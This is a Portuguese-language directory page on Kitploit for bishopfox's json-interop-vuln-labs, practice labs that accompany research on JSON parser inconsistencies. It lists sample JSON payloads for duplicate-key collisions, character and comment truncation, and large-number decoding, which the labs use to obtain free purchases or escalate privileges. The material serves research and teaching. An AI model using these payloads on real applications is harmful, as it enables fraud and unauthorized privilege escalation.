Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
json-interop-vuln-labs — Laboratórios complementares de "Uma Exploração de Vulnerabilidades de Interoperabilidade JSON" | Kitploit
Ferramentas/GitHubGitHub/bishopfox/json-interop-vuln-labs
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

Laboratórios complementares de "Uma Exploração de Vulnerabilidades de Interoperabilidade JSON"

Ver Repositório
21019há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Laboratórios de Vulnerabilidades de Interoperabilidade JSON

Descrição

Estes são os laboratórios complementares ao meu artigo de pesquisa "Uma Exploração das Vulnerabilidades de Interoperabilidade JSON".

Lab 1: Compras gratuitas numa Aplicação de Comércio Eletrónico

  • Ataques de Colisão de Chaves: Precedência Inconsistente de Chaves Duplicadas
  • Representações Inconsistentes de Números Grandes

Lab 2: Escalação de Privilégios numa Aplicação Multi-inquilino

  • Ataques de Colisão de Chaves: Truncamento de Caracteres

Por padrão, estes laboratórios vinculam-se às portas 5000-5004 do host.

Técnicas de Ataque

1. Colisões de Chaves

Precedência Inconsistente de Chaves Duplicadas

root@kitploit:~
{"qty": 1, "qty": -1}

Truncamento de Caracteres

Truncamento em analisadores de precedência da última chave (inverta a ordem para precedência da primeira chave)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

Truncamento de Comentários

Estes documentos tiram proveito do suporte inconsistente de comentários e do suporte a strings sem aspas:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. Decodificação de Números

Decodificação Inconsistente de Números Grandes

Estes grandes valores numéricos podem ser convertidos em strings (por exemplo, "+Infinity"), o que pode levar a vulnerabilidades de type-juggling. Ou podem ser convertidos para MAX_INT/MIN_INT, valores arredondados ou 0, o que pode permitir contornar a lógica de negócio.

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

Autor

Twitter: @theBumbleSec

GitHub: the-bumble

Baixar ferramenta